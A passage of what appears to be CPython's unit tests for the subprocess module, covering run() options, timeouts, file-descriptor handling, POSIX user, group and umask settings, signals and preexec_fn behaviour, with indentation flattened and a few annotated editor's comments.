@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
"Linux specific")
def test_failed_child_execute_fd_leak(self):
"""Test for the fork() failure fd leak reported in issue16327."""
fd_directory = '/proc/%d/fd' % os.getpid()
fds_before_popen = os.listdir(fd_directory)
with self.assertRaises(PopenTestException):
PopenExecuteChildRaises(
ZERO_RETURN_CMD, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# NOTE: This test doesn't verify that the real _execute_child
# does not close the file descriptors itself on the way out
# during an exception. Code inspection has confirmed that.
fds_after_exception = os.listdir(fd_directory)
self.assertEqual(fds_before_popen, fds_after_exception)
@unittest.skipIf(mswindows, "behavior currently not supported on Windows")
def test_file_not_found_includes_filename(self):
with self.assertRaises(FileNotFoundError) as c:
subprocess.call(['/opt/nonexistent_binary', 'with', 'some', 'args'])
self.assertEqual(c.exception.filename, '/opt/nonexistent_binary')
@unittest.skipIf(mswindows, "behavior currently not supported on Windows")
def test_file_not_found_with_bad_cwd(self):
with self.assertRaises(FileNotFoundError) as c:
subprocess.Popen(['exit', '0'], cwd='/some/nonexistent/directory')
self.assertEqual(c.exception.filename, '/some/nonexistent/directory')
def test_class_getitems(self):
self.assertIsInstance(subprocess.Popen[bytes], types.GenericAlias)
self.assertIsInstance(subprocess.CompletedProcess[str], types.GenericAlias)
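# --- Illustrative sketch (editor's addition, not part of the original test
# suite).  The class above repeatedly exercises Popen.communicate(), including
# its timeout handling; a minimal standalone version of that pattern looks
# roughly like the hypothetical helper below, which is never called by the
# tests.
def _example_communicate_with_timeout():
    import subprocess
    import sys
    child = subprocess.Popen(
        [sys.executable, "-c",
         "import sys; sys.stdout.write(sys.stdin.read())"],
        stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    try:
        # communicate() feeds stdin, drains the output pipe and waits for exit.
        out, _ = child.communicate(b"payload", timeout=5)
    except subprocess.TimeoutExpired:
        # On timeout the child is still running; kill it, then collect
        # whatever output it produced.
        child.kill()
        out, _ = child.communicate()
    return out  # b"payload" in the normal case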
class RunFuncTestCase(BaseTestCase):
def run_python(self, code, **kwargs):
"""Run Python code in a subprocess using subprocess.run"""
argv = [sys.executable, "-c", code]
return subprocess.run(argv, **kwargs)
def test_returncode(self):
# run() with a sequence argument
cp = self.run_python("import sys; sys.exit(47)")
self.assertEqual(cp.returncode, 47)
with self.assertRaises(subprocess.CalledProcessError):
cp.check_returncode()
def test_check(self):
with self.assertRaises(subprocess.CalledProcessError) as c:
self.run_python("import sys; sys.exit(47)", check=True)
self.assertEqual(c.exception.returncode, 47)
def test_check_zero(self):
# check_returncode shouldn't raise when returncode is zero
cp = subprocess.run(ZERO_RETURN_CMD, check=True)
self.assertEqual(cp.returncode, 0)
def test_timeout(self):
# run() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.run waits for the
# child.
with self.assertRaises(subprocess.TimeoutExpired):
self.run_python("while True: pass", timeout=0.0001)
def test_capture_stdout(self):
# capture stdout with zero return code
cp = self.run_python("print('BDFL')", stdout=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stdout)
def test_capture_stderr(self):
cp = self.run_python("import sys; sys.stderr.write('BDFL')",
stderr=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stderr)
def test_check_output_stdin_arg(self):
# run() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
stdin=tf, stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_input_arg(self):
# run() can be called with input set to bytes
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
input=b'pear', stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_stdin_with_input_arg(self):
# run() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError,
msg="Expected ValueError when stdin and input args supplied.") as c:
output = self.run_python("print('will not be run')",
stdin=tf, input=b'hare')
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
with self.assertRaises(subprocess.TimeoutExpired) as c:
cp = self.run_python((
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"),
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3, stdout=subprocess.PIPE)
self.assertEqual(c.exception.output, b'BDFL')
# output is aliased to stdout
self.assertEqual(c.exception.stdout, b'BDFL')
def test_run_kwargs(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
cp = self.run_python(('import sys, os;'
'sys.exit(33 if os.getenv("FRUIT")=="banana" else 31)'),
env=newenv)
self.assertEqual(cp.returncode, 33)
def test_run_with_pathlike_path(self):
# bpo-31961: test run(pathlike_object)
# the name of a command that can be run without
# any arguments and that exits quickly
prog = 'tree.com' if mswindows else 'ls'
path = shutil.which(prog)
if path is None:
self.skipTest(f'{prog} required for this test')
path = FakePath(path)
res = subprocess.run(path, stdout=subprocess.DEVNULL)
self.assertEqual(res.returncode, 0)
with self.assertRaises(TypeError):
subprocess.run(path, stdout=subprocess.DEVNULL, shell=True)
def test_run_with_bytes_path_and_arguments(self):
# bpo-31961: test run([bytes_object, b'additional arguments'])
path = os.fsencode(sys.executable)
args = [path, '-c', b'import sys; sys.exit(57)']
res = subprocess.run(args)
self.assertEqual(res.returncode, 57)
def test_run_with_pathlike_path_and_arguments(self):
# bpo-31961: test run([pathlike_object, 'additional arguments'])
path = FakePath(sys.executable)
args = [path, '-c', 'import sys; sys.exit(57)']
res = subprocess.run(args)
self.assertEqual(res.returncode, 57)
def test_capture_output(self):
cp = self.run_python(("import sys;"
"sys.stdout.write('BDFL'); "
"sys.stderr.write('FLUFL')"),
capture_output=True)
self.assertIn(b'BDFL', cp.stdout)
self.assertIn(b'FLUFL', cp.stderr)
def test_stdout_with_capture_output_arg(self):
# run() refuses to accept 'stdout' with 'capture_output'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
with self.assertRaises(ValueError,
msg=("Expected ValueError when stdout and capture_output "
"args supplied.")) as c:
output = self.run_python("print('will not be run')",
capture_output=True, stdout=tf)
self.assertIn('stdout', c.exception.args[0])
self.assertIn('capture_output', c.exception.args[0])
def test_stderr_with_capture_output_arg(self):
# run() refuses to accept 'stderr' with 'capture_output'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
with self.assertRaises(ValueError,
msg=("Expected ValueError when stderr and capture_output "
"args supplied.")) as c:
output = self.run_python("print('will not be run')",
capture_output=True, stderr=tf)
self.assertIn('stderr', c.exception.args[0])
self.assertIn('capture_output', c.exception.args[0])
# This test _might_ wind up a bit fragile on loaded build+test machines,
# as it depends on timing with wide enough margins for normal situations,
# but it does assert that the timeout happened "soon enough" to believe the
# right thing happened.
@unittest.skipIf(mswindows, "requires posix like 'sleep' shell command")
def test_run_with_shell_timeout_and_capture_output(self):
"""Output capturing after a timeout mustn't hang forever on open filehandles."""
before_secs = time.monotonic()
try:
subprocess.run('sleep 3', shell=True, timeout=0.1,
capture_output=True) # New session unspecified.
except subprocess.TimeoutExpired as exc:
after_secs = time.monotonic()
stacks = traceback.format_exc() # assertRaises doesn't give this.
else:
self.fail("TimeoutExpired not raised.")
self.assertLess(after_secs - before_secs, 1.5,
msg="TimeoutExpired was delayed! Bad traceback:\n```\n"
f"{stacks}```")
def _get_test_grp_name():
for name_group in ('staff', 'nogroup', 'grp', 'nobody', 'nfsnobody'):
if grp:
try:
grp.getgrnam(name_group)
except KeyError:
continue
return name_group
else:
raise unittest.SkipTest('No identified group name to use for this test on this platform.')
@unittest.skipIf(mswindows, "POSIX specific tests")
class POSIXProcessTestCase(BaseTestCase):
def setUp(self):
super().setUp()
self._nonexistent_dir = "/_this/pa.th/does/not/exist"
def _get_chdir_exception(self):
try:
os.chdir(self._nonexistent_dir)
except OSError as e:
# This avoids hard coding the errno value or the OS perror()
# string and instead captures the exception that we want to see
# below for comparison.
desired_exception = e
else:
self.fail("chdir to nonexistent directory %s succeeded." %
self._nonexistent_dir)
return desired_exception
def test_exception_cwd(self):
"""Test error in the child raised in the parent for a bad cwd."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
cwd=self._nonexistent_dir)
except OSError as e:
# Test that the child process chdir failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_executable(self):
"""Test error in the child raised in the parent for a bad executable."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
executable=self._nonexistent_dir)
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_args_0(self):
"""Test error in the child raised in the parent for a bad args[0]."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([self._nonexistent_dir, "-c", ""])
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
# We mock the __del__ method for Popen in the next two tests
# because it does cleanup based on the pid returned by fork_exec
# along with issuing a resource warning if it still exists. Since
# we don't actually spawn a process in these tests we can forego
# the destructor. An alternative would be to set _child_created to
# False before the destructor is called but there is no easy way
# to do that
class PopenNoDestructor(subprocess.Popen):
def __del__(self):
pass
@mock.patch("subprocess._posixsubprocess.fork_exec")
def test_exception_errpipe_normal(self, fork_exec):
"""Test error passing done through errpipe_write in the good case"""
def proper_error(*args):
errpipe_write = args[13]
# Write the hex for the error code EISDIR: 'is a directory'
err_code = '{:x}'.format(errno.EISDIR).encode()
os.write(errpipe_write, b"OSError:" + err_code + b":")
return 0
fork_exec.side_effect = proper_error
with mock.patch("subprocess.os.waitpid",
side_effect=ChildProcessError):
with self.assertRaises(IsADirectoryError):
self.PopenNoDestructor(["non_existent_command"])
@mock.patch("subprocess._posixsubprocess.fork_exec")
def test_exception_errpipe_bad_data(self, fork_exec):
"""Test error passing done through errpipe_write where its not
in the expected format"""
error_data = b"\xFF\x00\xDE\xAD"
def bad_error(*args):
errpipe_write = args[13]
# Anything can be in the pipe, no assumptions should
# be made about its encoding, so we'll write some
# arbitrary hex bytes to test it out
os.write(errpipe_write, error_data)
return 0
fork_exec.side_effect = bad_error
with mock.patch("subprocess.os.waitpid",
side_effect=ChildProcessError):
with self.assertRaises(subprocess.SubprocessError) as e:
self.PopenNoDestructor(["non_existent_command"])
self.assertIn(repr(error_data), str(e.exception))
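# Note (editor's addition): the two mocked tests above depend on the wire
# format the child uses on errpipe_write to report an exec failure, roughly
# b"ExceptionName:hex_errno:message".  Well-formed data is re-raised in the
# parent as the named exception; anything else surfaces as a generic
# SubprocessError that mentions the raw bytes.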
@unittest.skipIf(not os.path.exists('/proc/self/status'),
"need /proc/self/status")
def test_restore_signals(self):
# Blindly assume that cat exists on systems with /proc/self/status...
default_proc_status = subprocess.check_output(
['cat', '/proc/self/status'],
restore_signals=False)
for line in default_proc_status.splitlines():
if line.startswith(b'SigIgn'):
default_sig_ign_mask = line
break
else:
self.skipTest("SigIgn not found in /proc/self/status.")
restored_proc_status = subprocess.check_output(
['cat', '/proc/self/status'],
restore_signals=True)
for line in restored_proc_status.splitlines():
if line.startswith(b'SigIgn'):
restored_sig_ign_mask = line
break
self.assertNotEqual(default_sig_ign_mask, restored_sig_ign_mask,
msg="restore_signals=True should've unblocked "
"SIGPIPE and friends.")
def test_start_new_session(self):
# For code coverage of calling setsid().  We don't care if we get an
# EPERM error from it (that depends on the test execution environment);
# it still indicates that setsid() was called.
try:
output = subprocess.check_output(
[sys.executable, "-c", "import os; print(os.getsid(0))"],
start_new_session=True)
except OSError as e:
if e.errno != errno.EPERM:
raise
else:
parent_sid = os.getsid(0)
child_sid = int(output)
self.assertNotEqual(parent_sid, child_sid)
@unittest.skipUnless(hasattr(os, 'setreuid'), 'no setreuid on platform')
def test_user(self):
# For code coverage of the user parameter.  We don't care if we get an
# EPERM error from it (that depends on the test execution environment);
# it still indicates that the underlying call was made.
uid = os.geteuid()
test_users = [65534 if uid != 65534 else 65533, uid]
name_uid = "nobody" if sys.platform != 'darwin' else "unknown"
if pwd is not None:
try:
pwd.getpwnam(name_uid)
test_users.append(name_uid)
except KeyError:
# unknown user name
name_uid = None
for user in test_users:
# posix_spawn() may be used with close_fds=False
for close_fds in (False, True):
with self.subTest(user=user, close_fds=close_fds):
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os; print(os.getuid())"],
user=user,
close_fds=close_fds)
except PermissionError: # (EACCES, EPERM)
pass
except OSError as e:
if e.errno not in (errno.EACCES, errno.EPERM):
raise
else:
if isinstance(user, str):
user_uid = pwd.getpwnam(user).pw_uid
else:
user_uid = user
child_user = int(output)
self.assertEqual(child_user, user_uid)
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, user=-1)
if pwd is None and name_uid is not None:
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, user=name_uid)
@unittest.skipIf(hasattr(os, 'setreuid'), 'setreuid() available on platform')
def test_user_error(self):
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, user=65535)
@unittest.skipUnless(hasattr(os, 'setregid'), 'no setregid() on platform')
def test_group(self):
gid = os.getegid()
group_list = [65534 if gid != 65534 else 65533]
name_group = _get_test_grp_name()
if grp is not None:
group_list.append(name_group)
for group in group_list + [gid]:
# posix_spawn() may be used with close_fds=False
for close_fds in (False, True):
with self.subTest(group=group, close_fds=close_fds):
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os; print(os.getgid())"],
group=group,
close_fds=close_fds)
except PermissionError: # (EACCES, EPERM)
pass
else:
if isinstance(group, str):
group_gid = grp.getgrnam(group).gr_gid
else:
group_gid = group
child_group = int(output)
self.assertEqual(child_group, group_gid)
# make sure we bomb on negative values
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, group=-1)
if grp is None:
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, group=name_group)
@unittest.skipIf(hasattr(os, 'setregid'), 'setregid() available on platform')
def test_group_error(self):
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, group=65535)
@unittest.skipUnless(hasattr(os, 'setgroups'), 'no setgroups() on platform')
def test_extra_groups(self):
gid = os.getegid()
group_list = [65534 if gid != 65534 else 65533]
name_group = _get_test_grp_name()
perm_error = False
if grp is not None:
group_list.append(name_group)
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os, sys, json; json.dump(os.getgroups(), sys.stdout)"],
extra_groups=group_list)
except OSError as ex:
if ex.errno != errno.EPERM:
raise
perm_error = True
else:
parent_groups = os.getgroups()
child_groups = json.loads(output)
if grp is not None:
desired_gids = [grp.getgrnam(g).gr_gid if isinstance(g, str) else g
for g in group_list]
else:
desired_gids = group_list
if perm_error:
self.assertEqual(set(child_groups), set(parent_groups))
else:
self.assertEqual(set(desired_gids), set(child_groups))
# make sure we bomb on negative values
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, extra_groups=[-1])
if grp is None:
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD,
extra_groups=[name_group])
@unittest.skipIf(hasattr(os, 'setgroups'), 'setgroups() available on platform')
def test_extra_groups_error(self):
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, extra_groups=[])
@unittest.skipIf(mswindows or not hasattr(os, 'umask'),
'POSIX umask() is not available.')
def test_umask(self):
tmpdir = None
try:
tmpdir = tempfile.mkdtemp()
name = os.path.join(tmpdir, "beans")
# We set an unusual umask in the child so that the file it creates
# gets a unique mode that we can test for.
subprocess.check_call(
[sys.executable, "-c", f"open({name!r}, 'w').close()"],
umask=0o053)
# Ignore execute permissions entirely in our test,
# filesystems could be mounted to ignore or force that.
st_mode = os.stat(name).st_mode & 0o666
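# (Editor's note) open() asks for mode 0o666; applying the child's
# umask of 0o053 (0o666 & ~0o053) leaves 0o624.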
expected_mode = 0o624
self.assertEqual(expected_mode, st_mode,
msg=f'{oct(expected_mode)} != {oct(st_mode)}')
finally:
if tmpdir is not None:
shutil.rmtree(tmpdir)
def test_run_abort(self):
# returncode handles signal termination
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import os; os.abort()'])
p.wait()
self.assertEqual(-p.returncode, signal.SIGABRT)
def test_CalledProcessError_str_signal(self):
err = subprocess.CalledProcessError(-int(signal.SIGABRT), "fake cmd")
error_string = str(err)
# We're relying on the repr() of the signal.Signals IntEnum to provide
# the word signal, the signal name and the numeric value.
self.assertIn("signal", error_string.lower())
# We're not being specific about the signal name as some signals have
# multiple names and which name is revealed can vary.
self.assertIn("SIG", error_string)
self.assertIn(str(signal.SIGABRT), error_string)
def test_CalledProcessError_str_unknown_signal(self):
err = subprocess.CalledProcessError(-9876543, "fake cmd")
error_string = str(err)
self.assertIn("unknown signal 9876543.", error_string)
def test_CalledProcessError_str_non_zero(self):
err = subprocess.CalledProcessError(2, "fake cmd")
error_string = str(err)
self.assertIn("non-zero exit status 2.", error_string)
def test_preexec(self):
# DISCLAIMER: Setting environment variables is *not* a good use
# of a preexec_fn. This is merely a test.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
preexec_fn=lambda: os.putenv("FRUIT", "apple"))
with p:
self.assertEqual(p.stdout.read(), b"apple")
def test_preexec_exception(self):
def raise_it():
raise ValueError("What if two swallows carried a coconut?")
try:
p = subprocess.Popen([sys.executable, "-c", ""],
preexec_fn=raise_it)
except subprocess.SubprocessError as e:
self.assertTrue(
subprocess._posixsubprocess,
"Expected a ValueError from the preexec_fn")
except ValueError as e:
self.assertIn("coconut", e.args[0])
else:
self.fail("Exception raised by preexec_fn did not make it "
"to the parent process.")
class _TestExecuteChildPopen(subprocess.Popen):
"""Used to test behavior at the end of _execute_child."""
def __init__(self, testcase, *args, **kwargs):
self._testcase = testcase
subprocess.Popen.__init__(self, *args, **kwargs)
def _execute_child(self, *args, **kwargs):
try:
subprocess.Popen._execute_child(self, *args, **kwargs)
finally:
# Open a bunch of file descriptors and verify that
# none of them are the same as the ones the Popen
# instance is using for stdin/stdout/stderr.
devzero_fds = [os.open("/dev/zero", os.O_RDONLY)
for _ in range(8)]
try:
for fd in devzero_fds:
self._testcase.assertNotIn(
fd, (self.stdin.fileno(), self.stdout.fileno(),
self.stderr.fileno()),
msg="At least one fd was closed early.")
finally:
for fd in devzero_fds:
os.close(fd)
@unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.")
def test_preexec_errpipe_does_not_double_close_pipes(self):
"""Issue16140: Don't double close pipes on preexec error."""
def raise_it():
raise subprocess.SubprocessError(
"force the _execute_child() errpipe_data path.")
with self.assertRaises(subprocess.SubprocessError):
self._TestExecuteChildPopen(
self, ZERO_RETURN_CMD,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, preexec_fn=raise_it)
def test_preexec_gc_module_failure(self):
# This tests the code that disables garbage collection if the child
# process will execute any Python.
def raise_runtime_error():
raise RuntimeError("this shouldn't escape")
enabled = gc.isenabled()
orig_gc_disable = gc.disable
orig_gc_isenabled = gc.isenabled
try:
gc.disable()
self.assertFalse(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertFalse(gc.isenabled(),
"Popen enabled gc when it shouldn't.")
gc.enable()
self.assertTrue(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertTrue(gc.isenabled(), "Popen left gc disabled.")
gc.disable = raise_runtime_error
self.assertRaises(RuntimeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
del gc.isenabled # force an AttributeError
self.assertRaises(AttributeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
finally:
gc.disable = orig_gc_disable
gc.isenabled = orig_gc_isenabled
if not enabled:
gc.disable()
@unittest.skipIf(
sys.platform == 'darwin', 'setrlimit() seems to fail on OS X')
def test_preexec_fork_failure(self):
# The internal code did not preserve the previous exception when
# re-enabling garbage collection
try:
from resource import getrlimit, setrlimit, RLIMIT_NPROC
except ImportError as err:
self.skipTest(err) # RLIMIT_NPROC is specific to Linux and BSD
limits = getrlimit(RLIMIT_NPROC)
[_, hard] = limits
setrlimit(RLIMIT_NPROC, (0, hard))
self.addCleanup(setrlimit, RLIMIT_NPROC, limits)
try:
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
except BlockingIOError:
# Forking should raise EAGAIN, translated to BlockingIOError
pass
else:
self.skipTest('RLIMIT_NPROC had no effect; probably superuser')
def test_args_string(self):
# args is a string
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
p = subprocess.Popen(fname)
p.wait()
os.remove(fname)
self.assertEqual(p.returncode, 47)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
startupinfo=47)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
creationflags=47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen(["echo $FRUIT"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen("echo $FRUIT", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_call_string(self):
# call() function with string argument on UNIX
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
rc = subprocess.call(fname)
os.remove(fname)
self.assertEqual(rc, 47)
def test_specific_shell(self):
# Issue #9265: Incorrect name passed as arg[0].
shells = []
for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']:
for name in ['bash', 'ksh']:
sh = os.path.join(prefix, name)
if os.path.isfile(sh):
shells.append(sh)
if not shells: # Will probably work for any shell but csh.
self.skipTest("bash or ksh required for this test")
sh = '/bin/sh'
if os.path.isfile(sh) and not os.path.islink(sh):
# Test will fail if /bin/sh is a symlink to csh.
shells.append(sh)
for sh in shells:
p = subprocess.Popen("echo $0", executable=sh, shell=True,
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read().strip(), bytes(sh, 'ascii'))
def _kill_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
# Also set the SIGINT handler to the default to make sure it's not
# being ignored (some tests rely on that.)
old_handler = signal.signal(signal.SIGINT, signal.default_int_handler)
try:
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
signal.signal(signal.SIGINT, old_handler)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
return p
@unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')),
"Due to known OS bug (issue #16762)")
def _kill_dead_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
p.communicate()
def test_send_signal(self):
p = self._kill_process('send_signal', signal.SIGINT)
_, stderr = p.communicate()
self.assertIn(b'KeyboardInterrupt', stderr)
self.assertNotEqual(p.wait(), 0)
def test_kill(self):
p = self._kill_process('kill')
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGKILL)
def test_terminate(self):
p = self._kill_process('terminate')
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGTERM)
def test_send_signal_dead(self):
# Sending a signal to a dead process
self._kill_dead_process('send_signal', signal.SIGINT)
def test_kill_dead(self):
# Killing a dead process
self._kill_dead_process('kill')
def test_terminate_dead(self):
# Terminating a dead process
self._kill_dead_process('terminate')
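# Note (editor's addition): the two helpers below park the requested fds on
# duplicates (remembering each fd's inheritable flag) so a test can close
# or overwrite fds 0-2, and later put everything back with dup2().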
def _save_fds(self, save_fds):
fds = []
for fd in save_fds:
inheritable = os.get_inheritable(fd)
saved = os.dup(fd)
fds.append((fd, saved, inheritable))
return fds
def _restore_fds(self, fds):
for fd, saved, inheritable in fds:
os.dup2(saved, fd, inheritable=inheritable)
os.close(saved)
def check_close_std_fds(self, fds):
# Issue #9905: test that subprocess pipes still work properly with
# some standard fds closed
stdin = 0
saved_fds = self._save_fds(fds)
for fd, saved, inheritable in saved_fds:
if fd == 0:
stdin = saved
break
try:
for fd in fds:
os.close(fd)
out, err = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
self.assertEqual(out, b'apple')
self.assertEqual(err, b'orange')
finally:
self._restore_fds(saved_fds)
def test_close_fd_0(self):
self.check_close_std_fds([0])
def test_close_fd_1(self):
self.check_close_std_fds([1])
def test_close_fd_2(self):
self.check_close_std_fds([2])
def test_close_fds_0_1(self):
self.check_close_std_fds([0, 1])
def test_close_fds_0_2(self):
self.check_close_std_fds([0, 2])
def test_close_fds_1_2(self):
self.check_close_std_fds([1, 2])
def test_close_fds_0_1_2(self):
# Issue #10806: test that subprocess pipes still work properly with
# all standard fds closed.
self.check_close_std_fds([0, 1, 2])
def test_small_errpipe_write_fd(self):
"""Issue #15798: Popen should work when stdio fds are available."""
new_stdin = os.dup(0)
new_stdout = os.dup(1)
try:
os.close(0)
os.close(1)
# Side test: if errpipe_write fails to have its CLOEXEC
# flag set, this should cause the parent to think the exec
# failed. Extremely unlikely: everyone supports CLOEXEC.
subprocess.Popen([
sys.executable, "-c",
"print('AssertionError:0:CLOEXEC failure.')"]).wait()
finally:
# Restore original stdin and stdout
os.dup2(new_stdin, 0)
os.dup2(new_stdout, 1)
os.close(new_stdin)
os.close(new_stdout)
def test_remapping_std_fds(self):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
try:
temp_fds = [fd for fd, fname in temps]
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# write some data to what will become stdin, and rewind
os.write(temp_fds[1], b"STDIN")
os.lseek(temp_fds[1], 0, 0)
# move the standard file descriptors out of the way
saved_fds = self._save_fds(range(3))
try:
# duplicate the file objects over the standard fd's
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# now use those files in the "wrong" order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=temp_fds[1],
stdout=temp_fds[2],
stderr=temp_fds[0])
p.wait()
finally:
self._restore_fds(saved_fds)
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(temp_fds[2], 1024)
err = os.read(temp_fds[0], 1024).strip()
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
def check_swap_fds(self, stdin_no, stdout_no, stderr_no):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
temp_fds = [fd for fd, fname in temps]
try:
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# save a copy of the standard file descriptors
saved_fds = self._save_fds(range(3))
try:
# duplicate the temp files over the standard fd's 0, 1, 2
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# write some data to what will become stdin, and rewind
os.write(stdin_no, b"STDIN")
os.lseek(stdin_no, 0, 0)
# now use those files in the given order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=stdin_no,
stdout=stdout_no,
stderr=stderr_no)
p.wait()
for fd in temp_fds:
os.lseek(fd, 0, 0)
